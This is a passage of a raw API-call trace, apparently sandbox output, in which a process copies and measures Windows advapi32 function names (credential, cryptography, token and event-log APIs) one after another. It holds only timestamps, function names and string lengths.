(lpString="COPYSID") returned 7 [0030.838] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateCodeAuthzLevel" | out: lpString1="CreateCodeAuthzLevel") returned="CreateCodeAuthzLevel" [0030.838] lstrlenA (lpString="CREATECODEAUTHZLEVEL") returned 20 [0030.838] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreatePrivateObjectSecurity" | out: lpString1="CreatePrivateObjectSecurity") returned="CreatePrivateObjectSecurity" [0030.838] lstrlenA (lpString="CREATEPRIVATEOBJECTSECURITY") returned 27 [0030.838] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreatePrivateObjectSecurityEx" | out: lpString1="CreatePrivateObjectSecurityEx") returned="CreatePrivateObjectSecurityEx" [0030.838] lstrlenA (lpString="CREATEPRIVATEOBJECTSECURITYEX") returned 29 [0030.838] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreatePrivateObjectSecurityWithMultipleInheritance" | out: lpString1="CreatePrivateObjectSecurityWithMultipleInheritance") returned="CreatePrivateObjectSecurityWithMultipleInheritance" [0030.838] lstrlenA (lpString="CREATEPRIVATEOBJECTSECURITYWITHMULTIPLEINHERITANCE") returned 50 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateProcessAsUserA" | out: lpString1="CreateProcessAsUserA") returned="CreateProcessAsUserA" [0030.839] lstrlenA (lpString="CREATEPROCESSASUSERA") returned 20 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0030.839] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateProcessWithLogonW" | out: lpString1="CreateProcessWithLogonW") returned="CreateProcessWithLogonW" [0030.839] lstrlenA (lpString="CREATEPROCESSWITHLOGONW") returned 23 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateProcessWithTokenW" | out: lpString1="CreateProcessWithTokenW") returned="CreateProcessWithTokenW" [0030.839] lstrlenA (lpString="CREATEPROCESSWITHTOKENW") returned 23 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateRestrictedToken" | out: lpString1="CreateRestrictedToken") returned="CreateRestrictedToken" [0030.839] lstrlenA (lpString="CREATERESTRICTEDTOKEN") returned 21 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateServiceA" | out: lpString1="CreateServiceA") returned="CreateServiceA" [0030.839] lstrlenA (lpString="CREATESERVICEA") returned 14 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateServiceW" | out: lpString1="CreateServiceW") returned="CreateServiceW" [0030.839] lstrlenA (lpString="CREATESERVICEW") returned 14 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateTraceInstanceId" | out: lpString1="CreateTraceInstanceId") returned="CreateTraceInstanceId" [0030.839] lstrlenA (lpString="CREATETRACEINSTANCEID") returned 21 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateWellKnownSid" | out: lpString1="CreateWellKnownSid") returned="CreateWellKnownSid" [0030.839] lstrlenA (lpString="CREATEWELLKNOWNSID") returned 18 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredBackupCredentials" | out: lpString1="CredBackupCredentials") returned="CredBackupCredentials" [0030.839] lstrlenA (lpString="CREDBACKUPCREDENTIALS") returned 21 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredDeleteA" | out: lpString1="CredDeleteA") returned="CredDeleteA" [0030.839] lstrlenA (lpString="CREDDELETEA") returned 11 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredDeleteW" | out: lpString1="CredDeleteW") returned="CredDeleteW" [0030.839] lstrlenA (lpString="CREDDELETEW") returned 11 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredEncryptAndMarshalBinaryBlob" | out: lpString1="CredEncryptAndMarshalBinaryBlob") returned="CredEncryptAndMarshalBinaryBlob" [0030.839] lstrlenA (lpString="CREDENCRYPTANDMARSHALBINARYBLOB") returned 31 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredEnumerateA" | out: lpString1="CredEnumerateA") returned="CredEnumerateA" [0030.839] lstrlenA (lpString="CREDENUMERATEA") returned 14 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredEnumerateW" | out: lpString1="CredEnumerateW") returned="CredEnumerateW" [0030.839] lstrlenA (lpString="CREDENUMERATEW") returned 14 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredFindBestCredentialA" | out: lpString1="CredFindBestCredentialA") returned="CredFindBestCredentialA" [0030.839] lstrlenA (lpString="CREDFINDBESTCREDENTIALA") returned 23 [0030.839] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredFindBestCredentialW" | out: lpString1="CredFindBestCredentialW") returned="CredFindBestCredentialW" [0030.840] lstrlenA (lpString="CREDFINDBESTCREDENTIALW") returned 23 [0030.840] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredFree" | out: lpString1="CredFree") returned="CredFree" [0030.840] lstrlenA (lpString="CREDFREE") returned 8 [0030.840] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredGetSessionTypes" | out: lpString1="CredGetSessionTypes") returned="CredGetSessionTypes" [0030.840] lstrlenA (lpString="CREDGETSESSIONTYPES") returned 19 [0030.840] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredGetTargetInfoA" | out: lpString1="CredGetTargetInfoA") returned="CredGetTargetInfoA" [0030.840] lstrlenA (lpString="CREDGETTARGETINFOA") returned 18 [0030.840] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredGetTargetInfoW" | out: lpString1="CredGetTargetInfoW") returned="CredGetTargetInfoW" [0030.840] lstrlenA (lpString="CREDGETTARGETINFOW") returned 18 [0030.840] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredIsMarshaledCredentialA" | out: lpString1="CredIsMarshaledCredentialA") returned="CredIsMarshaledCredentialA" [0030.840] lstrlenA (lpString="CREDISMARSHALEDCREDENTIALA") returned 26 [0030.840] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredIsMarshaledCredentialW" | out: lpString1="CredIsMarshaledCredentialW") returned="CredIsMarshaledCredentialW" [0030.840] lstrlenA (lpString="CREDISMARSHALEDCREDENTIALW") returned 26 [0030.840] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredIsProtectedA" | out: lpString1="CredIsProtectedA") returned="CredIsProtectedA" [0030.840] lstrlenA (lpString="CREDISPROTECTEDA") returned 16 [0030.840] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredIsProtectedW" | out: lpString1="CredIsProtectedW") returned="CredIsProtectedW" [0030.840] lstrlenA (lpString="CREDISPROTECTEDW") returned 16 [0030.840] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredMarshalCredentialA" | out: lpString1="CredMarshalCredentialA") returned="CredMarshalCredentialA" [0030.840] lstrlenA (lpString="CREDMARSHALCREDENTIALA") returned 22 [0030.840] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredMarshalCredentialW" | out: lpString1="CredMarshalCredentialW") returned="CredMarshalCredentialW" [0030.840] lstrlenA (lpString="CREDMARSHALCREDENTIALW") returned 22 [0030.840] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredProfileLoaded" | out: lpString1="CredProfileLoaded") returned="CredProfileLoaded" [0030.840] lstrlenA (lpString="CREDPROFILELOADED") returned 17 [0030.840] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredProfileUnloaded" | out: lpString1="CredProfileUnloaded") returned="CredProfileUnloaded" [0030.840] lstrlenA (lpString="CREDPROFILEUNLOADED") returned 19 [0030.840] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredProtectA" | out: lpString1="CredProtectA") returned="CredProtectA" [0030.841] lstrlenA (lpString="CREDPROTECTA") returned 12 [0030.841] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredProtectW" | out: lpString1="CredProtectW") returned="CredProtectW" [0030.841] lstrlenA (lpString="CREDPROTECTW") returned 12 [0030.841] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredReadA" | out: lpString1="CredReadA") returned="CredReadA" [0030.841] lstrlenA (lpString="CREDREADA") returned 9 [0030.841] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredReadByTokenHandle" | out: lpString1="CredReadByTokenHandle") returned="CredReadByTokenHandle" [0030.841] lstrlenA (lpString="CREDREADBYTOKENHANDLE") returned 21 [0030.841] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredReadDomainCredentialsA" | out: lpString1="CredReadDomainCredentialsA") returned="CredReadDomainCredentialsA" [0030.841] lstrlenA (lpString="CREDREADDOMAINCREDENTIALSA") returned 26 [0030.841] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredReadDomainCredentialsW" | out: lpString1="CredReadDomainCredentialsW") returned="CredReadDomainCredentialsW" [0030.841] lstrlenA (lpString="CREDREADDOMAINCREDENTIALSW") returned 26 [0030.841] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredReadW" | out: lpString1="CredReadW") returned="CredReadW" [0030.841] lstrlenA (lpString="CREDREADW") returned 9 [0030.841] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredRenameA" | out: lpString1="CredRenameA") returned="CredRenameA" [0030.841] lstrlenA (lpString="CREDRENAMEA") returned 11 [0030.841] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredRenameW" | out: lpString1="CredRenameW") returned="CredRenameW" [0030.841] lstrlenA (lpString="CREDRENAMEW") returned 11 [0030.841] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredRestoreCredentials" | out: lpString1="CredRestoreCredentials") returned="CredRestoreCredentials" [0030.841] lstrlenA (lpString="CREDRESTORECREDENTIALS") returned 22 [0030.841] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredUnmarshalCredentialA" | out: lpString1="CredUnmarshalCredentialA") returned="CredUnmarshalCredentialA" [0030.841] lstrlenA (lpString="CREDUNMARSHALCREDENTIALA") returned 24 [0030.841] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredUnmarshalCredentialW" | out: lpString1="CredUnmarshalCredentialW") returned="CredUnmarshalCredentialW" [0030.841] lstrlenA (lpString="CREDUNMARSHALCREDENTIALW") returned 24 [0030.841] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredUnprotectA" | out: lpString1="CredUnprotectA") returned="CredUnprotectA" [0030.841] lstrlenA (lpString="CREDUNPROTECTA") returned 14 [0030.841] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredUnprotectW" | out: lpString1="CredUnprotectW") returned="CredUnprotectW" [0030.841] lstrlenA (lpString="CREDUNPROTECTW") returned 14 [0030.841] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredWriteA" | out: lpString1="CredWriteA") returned="CredWriteA" [0030.841] lstrlenA (lpString="CREDWRITEA") returned 10 [0030.841] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredWriteDomainCredentialsA" | out: lpString1="CredWriteDomainCredentialsA") returned="CredWriteDomainCredentialsA" [0030.841] lstrlenA (lpString="CREDWRITEDOMAINCREDENTIALSA") returned 27 [0030.841] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredWriteDomainCredentialsW" | out: lpString1="CredWriteDomainCredentialsW") returned="CredWriteDomainCredentialsW" [0030.842] lstrlenA (lpString="CREDWRITEDOMAINCREDENTIALSW") returned 27 [0030.842] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredWriteW" | out: lpString1="CredWriteW") returned="CredWriteW" [0030.842] lstrlenA (lpString="CREDWRITEW") returned 10 [0030.842] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredpConvertCredential" | out: lpString1="CredpConvertCredential") returned="CredpConvertCredential" [0030.842] lstrlenA (lpString="CREDPCONVERTCREDENTIAL") returned 22 [0030.842] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredpConvertOneCredentialSize" | out: lpString1="CredpConvertOneCredentialSize") returned="CredpConvertOneCredentialSize" [0030.842] lstrlenA (lpString="CREDPCONVERTONECREDENTIALSIZE") returned 29 [0030.842] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredpConvertTargetInfo" | out: lpString1="CredpConvertTargetInfo") returned="CredpConvertTargetInfo" [0030.842] lstrlenA (lpString="CREDPCONVERTTARGETINFO") returned 22 [0030.842] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredpDecodeCredential" | out: lpString1="CredpDecodeCredential") returned="CredpDecodeCredential" [0030.842] lstrlenA (lpString="CREDPDECODECREDENTIAL") returned 21 [0030.842] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredpEncodeCredential" | out: lpString1="CredpEncodeCredential") returned="CredpEncodeCredential" [0030.842] lstrlenA (lpString="CREDPENCODECREDENTIAL") returned 21 [0030.842] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CredpEncodeSecret" | out: lpString1="CredpEncodeSecret") returned="CredpEncodeSecret" [0030.842] lstrlenA (lpString="CREDPENCODESECRET") returned 17 [0030.842] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptAcquireContextA" | out: lpString1="CryptAcquireContextA") returned="CryptAcquireContextA" [0030.842] lstrlenA (lpString="CRYPTACQUIRECONTEXTA") returned 20 [0030.842] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptAcquireContextW" | out: lpString1="CryptAcquireContextW") returned="CryptAcquireContextW" [0030.842] lstrlenA (lpString="CRYPTACQUIRECONTEXTW") returned 20 [0030.842] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptContextAddRef" | out: lpString1="CryptContextAddRef") returned="CryptContextAddRef" [0030.842] lstrlenA (lpString="CRYPTCONTEXTADDREF") returned 18 [0030.842] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptCreateHash" | out: lpString1="CryptCreateHash") returned="CryptCreateHash" [0030.842] lstrlenA (lpString="CRYPTCREATEHASH") returned 15 [0030.842] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptDecrypt" | out: lpString1="CryptDecrypt") returned="CryptDecrypt" [0030.842] lstrlenA (lpString="CRYPTDECRYPT") returned 12 [0030.842] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptDeriveKey" | out: lpString1="CryptDeriveKey") returned="CryptDeriveKey" [0030.842] lstrlenA (lpString="CRYPTDERIVEKEY") returned 14 [0030.842] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptDestroyHash" | out: lpString1="CryptDestroyHash") returned="CryptDestroyHash" [0030.842] lstrlenA (lpString="CRYPTDESTROYHASH") returned 16 [0030.842] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptDestroyKey" | out: lpString1="CryptDestroyKey") returned="CryptDestroyKey" [0030.842] lstrlenA (lpString="CRYPTDESTROYKEY") returned 15 [0030.843] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptDuplicateHash" | out: lpString1="CryptDuplicateHash") returned="CryptDuplicateHash" [0030.843] lstrlenA (lpString="CRYPTDUPLICATEHASH") returned 18 [0030.843] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptDuplicateKey" | out: lpString1="CryptDuplicateKey") returned="CryptDuplicateKey" [0030.843] lstrlenA (lpString="CRYPTDUPLICATEKEY") returned 17 [0030.843] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptEncrypt" | out: lpString1="CryptEncrypt") returned="CryptEncrypt" [0030.843] lstrlenA (lpString="CRYPTENCRYPT") returned 12 [0030.843] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptEnumProviderTypesA" | out: lpString1="CryptEnumProviderTypesA") returned="CryptEnumProviderTypesA" [0030.843] lstrlenA (lpString="CRYPTENUMPROVIDERTYPESA") returned 23 [0030.843] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptEnumProviderTypesW" | out: lpString1="CryptEnumProviderTypesW") returned="CryptEnumProviderTypesW" [0030.843] lstrlenA (lpString="CRYPTENUMPROVIDERTYPESW") returned 23 [0030.843] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptEnumProvidersA" | out: lpString1="CryptEnumProvidersA") returned="CryptEnumProvidersA" [0030.843] lstrlenA (lpString="CRYPTENUMPROVIDERSA") returned 19 [0030.843] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptEnumProvidersW" | out: lpString1="CryptEnumProvidersW") returned="CryptEnumProvidersW" [0030.843] lstrlenA (lpString="CRYPTENUMPROVIDERSW") returned 19 [0030.843] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptExportKey" | out: lpString1="CryptExportKey") returned="CryptExportKey" [0030.843] lstrlenA (lpString="CRYPTEXPORTKEY") returned 14 [0030.843] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptGenKey" | out: lpString1="CryptGenKey") returned="CryptGenKey" [0030.843] lstrlenA (lpString="CRYPTGENKEY") returned 11 [0030.843] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptGenRandom" | out: lpString1="CryptGenRandom") returned="CryptGenRandom" [0030.843] lstrlenA (lpString="CRYPTGENRANDOM") returned 14 [0030.843] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptGetDefaultProviderA" | out: lpString1="CryptGetDefaultProviderA") returned="CryptGetDefaultProviderA" [0030.843] lstrlenA (lpString="CRYPTGETDEFAULTPROVIDERA") returned 24 [0030.843] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptGetDefaultProviderW" | out: lpString1="CryptGetDefaultProviderW") returned="CryptGetDefaultProviderW" [0030.843] lstrlenA (lpString="CRYPTGETDEFAULTPROVIDERW") returned 24 [0030.843] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptGetHashParam" | out: lpString1="CryptGetHashParam") returned="CryptGetHashParam" [0030.843] lstrlenA (lpString="CRYPTGETHASHPARAM") returned 17 [0030.843] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptGetKeyParam" | out: lpString1="CryptGetKeyParam") returned="CryptGetKeyParam" [0030.843] lstrlenA (lpString="CRYPTGETKEYPARAM") returned 16 [0030.843] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptGetProvParam" | out: lpString1="CryptGetProvParam") returned="CryptGetProvParam" [0030.843] lstrlenA (lpString="CRYPTGETPROVPARAM") returned 17 [0030.843] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptGetUserKey" | out: lpString1="CryptGetUserKey") returned="CryptGetUserKey" [0030.843] lstrlenA (lpString="CRYPTGETUSERKEY") returned 15 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptHashData" | out: lpString1="CryptHashData") returned="CryptHashData" [0030.844] lstrlenA (lpString="CRYPTHASHDATA") returned 13 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptHashSessionKey" | out: lpString1="CryptHashSessionKey") returned="CryptHashSessionKey" [0030.844] lstrlenA (lpString="CRYPTHASHSESSIONKEY") returned 19 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptImportKey" | out: lpString1="CryptImportKey") returned="CryptImportKey" [0030.844] lstrlenA (lpString="CRYPTIMPORTKEY") returned 14 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptReleaseContext" | out: lpString1="CryptReleaseContext") returned="CryptReleaseContext" [0030.844] lstrlenA (lpString="CRYPTRELEASECONTEXT") returned 19 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptSetHashParam" | out: lpString1="CryptSetHashParam") returned="CryptSetHashParam" [0030.844] lstrlenA (lpString="CRYPTSETHASHPARAM") returned 17 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptSetKeyParam" | out: lpString1="CryptSetKeyParam") returned="CryptSetKeyParam" [0030.844] lstrlenA (lpString="CRYPTSETKEYPARAM") returned 16 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptSetProvParam" | out: lpString1="CryptSetProvParam") returned="CryptSetProvParam" [0030.844] lstrlenA (lpString="CRYPTSETPROVPARAM") returned 17 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptSetProviderA" | out: lpString1="CryptSetProviderA") returned="CryptSetProviderA" [0030.844] lstrlenA (lpString="CRYPTSETPROVIDERA") returned 17 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptSetProviderExA" | out: lpString1="CryptSetProviderExA") returned="CryptSetProviderExA" [0030.844] lstrlenA (lpString="CRYPTSETPROVIDEREXA") returned 19 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptSetProviderExW" | out: lpString1="CryptSetProviderExW") returned="CryptSetProviderExW" [0030.844] lstrlenA (lpString="CRYPTSETPROVIDEREXW") returned 19 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptSetProviderW" | out: lpString1="CryptSetProviderW") returned="CryptSetProviderW" [0030.844] lstrlenA (lpString="CRYPTSETPROVIDERW") returned 17 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptSignHashA" | out: lpString1="CryptSignHashA") returned="CryptSignHashA" [0030.844] lstrlenA (lpString="CRYPTSIGNHASHA") returned 14 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptSignHashW" | out: lpString1="CryptSignHashW") returned="CryptSignHashW" [0030.844] lstrlenA (lpString="CRYPTSIGNHASHW") returned 14 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptVerifySignatureA" | out: lpString1="CryptVerifySignatureA") returned="CryptVerifySignatureA" [0030.844] lstrlenA (lpString="CRYPTVERIFYSIGNATUREA") returned 21 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CryptVerifySignatureW" | out: lpString1="CryptVerifySignatureW") returned="CryptVerifySignatureW" [0030.844] lstrlenA (lpString="CRYPTVERIFYSIGNATUREW") returned 21 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DecryptFileA" | out: lpString1="DecryptFileA") returned="DecryptFileA" [0030.844] lstrlenA (lpString="DECRYPTFILEA") returned 12 [0030.844] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DecryptFileW" | out: lpString1="DecryptFileW") returned="DecryptFileW" [0030.844] lstrlenA (lpString="DECRYPTFILEW") returned 12 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeleteAce" | out: lpString1="DeleteAce") returned="DeleteAce" [0030.845] lstrlenA (lpString="DELETEACE") returned 9 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeleteService" | out: lpString1="DeleteService") returned="DeleteService" [0030.845] lstrlenA (lpString="DELETESERVICE") returned 13 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DeregisterEventSource" | out: lpString1="DeregisterEventSource") returned="DeregisterEventSource" [0030.845] lstrlenA (lpString="DEREGISTEREVENTSOURCE") returned 21 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DestroyPrivateObjectSecurity" | out: lpString1="DestroyPrivateObjectSecurity") returned="DestroyPrivateObjectSecurity" [0030.845] lstrlenA (lpString="DESTROYPRIVATEOBJECTSECURITY") returned 28 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DuplicateEncryptionInfoFile" | out: lpString1="DuplicateEncryptionInfoFile") returned="DuplicateEncryptionInfoFile" [0030.845] lstrlenA (lpString="DUPLICATEENCRYPTIONINFOFILE") returned 27 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DuplicateToken" | out: lpString1="DuplicateToken") returned="DuplicateToken" [0030.845] lstrlenA (lpString="DUPLICATETOKEN") returned 14 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="DuplicateTokenEx" | out: lpString1="DuplicateTokenEx") returned="DuplicateTokenEx" [0030.845] lstrlenA (lpString="DUPLICATETOKENEX") returned 16 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfBackupEventLogFileA" | out: lpString1="ElfBackupEventLogFileA") returned="ElfBackupEventLogFileA" [0030.845] lstrlenA (lpString="ELFBACKUPEVENTLOGFILEA") returned 22 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfBackupEventLogFileW" | out: lpString1="ElfBackupEventLogFileW") returned="ElfBackupEventLogFileW" [0030.845] lstrlenA (lpString="ELFBACKUPEVENTLOGFILEW") returned 22 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfChangeNotify" | out: lpString1="ElfChangeNotify") returned="ElfChangeNotify" [0030.845] lstrlenA (lpString="ELFCHANGENOTIFY") returned 15 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfClearEventLogFileA" | out: lpString1="ElfClearEventLogFileA") returned="ElfClearEventLogFileA" [0030.845] lstrlenA (lpString="ELFCLEAREVENTLOGFILEA") returned 21 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfClearEventLogFileW" | out: lpString1="ElfClearEventLogFileW") returned="ElfClearEventLogFileW" [0030.845] lstrlenA (lpString="ELFCLEAREVENTLOGFILEW") returned 21 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfCloseEventLog" | out: lpString1="ElfCloseEventLog") returned="ElfCloseEventLog" [0030.845] lstrlenA (lpString="ELFCLOSEEVENTLOG") returned 16 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfDeregisterEventSource" | out: lpString1="ElfDeregisterEventSource") returned="ElfDeregisterEventSource" [0030.845] lstrlenA (lpString="ELFDEREGISTEREVENTSOURCE") returned 24 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfFlushEventLog" | out: lpString1="ElfFlushEventLog") returned="ElfFlushEventLog" [0030.845] lstrlenA (lpString="ELFFLUSHEVENTLOG") returned 16 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfNumberOfRecords" | out: lpString1="ElfNumberOfRecords") returned="ElfNumberOfRecords" [0030.845] lstrlenA (lpString="ELFNUMBEROFRECORDS") returned 18 [0030.845] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfOldestRecord" | out: lpString1="ElfOldestRecord") returned="ElfOldestRecord" [0030.846] lstrlenA (lpString="ELFOLDESTRECORD") returned 15 [0030.846] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfOpenBackupEventLogA" | out: lpString1="ElfOpenBackupEventLogA") returned="ElfOpenBackupEventLogA" [0030.846] lstrlenA (lpString="ELFOPENBACKUPEVENTLOGA") returned 22 [0030.846] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfOpenBackupEventLogW" | out: lpString1="ElfOpenBackupEventLogW") returned="ElfOpenBackupEventLogW" [0030.846] lstrlenA (lpString="ELFOPENBACKUPEVENTLOGW") returned 22 [0030.846] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfOpenEventLogA" | out: lpString1="ElfOpenEventLogA") returned="ElfOpenEventLogA" [0030.846] lstrlenA (lpString="ELFOPENEVENTLOGA") returned 16 [0030.846] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfOpenEventLogW" | out: lpString1="ElfOpenEventLogW") returned="ElfOpenEventLogW" [0030.846] lstrlenA (lpString="ELFOPENEVENTLOGW") returned 16 [0030.846] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfReadEventLogA" | out: lpString1="ElfReadEventLogA") returned="ElfReadEventLogA" [0030.846] lstrlenA (lpString="ELFREADEVENTLOGA") returned 16 [0030.846] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfReadEventLogW" | out: lpString1="ElfReadEventLogW") returned="ElfReadEventLogW" [0030.846] lstrlenA (lpString="ELFREADEVENTLOGW") returned 16 [0030.846] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfRegisterEventSourceA" | out: lpString1="ElfRegisterEventSourceA") returned="ElfRegisterEventSourceA" [0030.846] lstrlenA (lpString="ELFREGISTEREVENTSOURCEA") returned 23 [0030.846] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfRegisterEventSourceW" | out: lpString1="ElfRegisterEventSourceW") returned="ElfRegisterEventSourceW" [0030.846] lstrlenA (lpString="ELFREGISTEREVENTSOURCEW") returned 23 [0030.846] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfReportEventA" | out: lpString1="ElfReportEventA") returned="ElfReportEventA" [0030.846] lstrlenA (lpString="ELFREPORTEVENTA") returned 15 [0030.846] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfReportEventAndSourceW" | out: lpString1="ElfReportEventAndSourceW") returned="ElfReportEventAndSourceW" [0030.846] lstrlenA (lpString="ELFREPORTEVENTANDSOURCEW") returned 24 [0030.846] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ElfReportEventW" | out: lpString1="ElfReportEventW") returned="ElfReportEventW" [0030.846] lstrlenA (lpString="ELFREPORTEVENTW") returned 15 [0030.846] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EnableTrace" | out: lpString1="EnableTrace") returned="EnableTrace" [0030.846] lstrlenA (lpString="ENABLETRACE") returned 11 [0030.846] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EnableTraceEx" | out: lpString1="EnableTraceEx") returned="EnableTraceEx" [0030.846] lstrlenA (lpString="ENABLETRACEEX") returned 13 [0030.846] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EnableTraceEx2" | out: lpString1="EnableTraceEx2") returned="EnableTraceEx2" [0030.846] lstrlenA (lpString="ENABLETRACEEX2") returned 14 [0030.846] lstrcpyA (in: lpString1=0xc9dc50, lpString2="EncryptFileA" | out: lpString1="EncryptFileA") 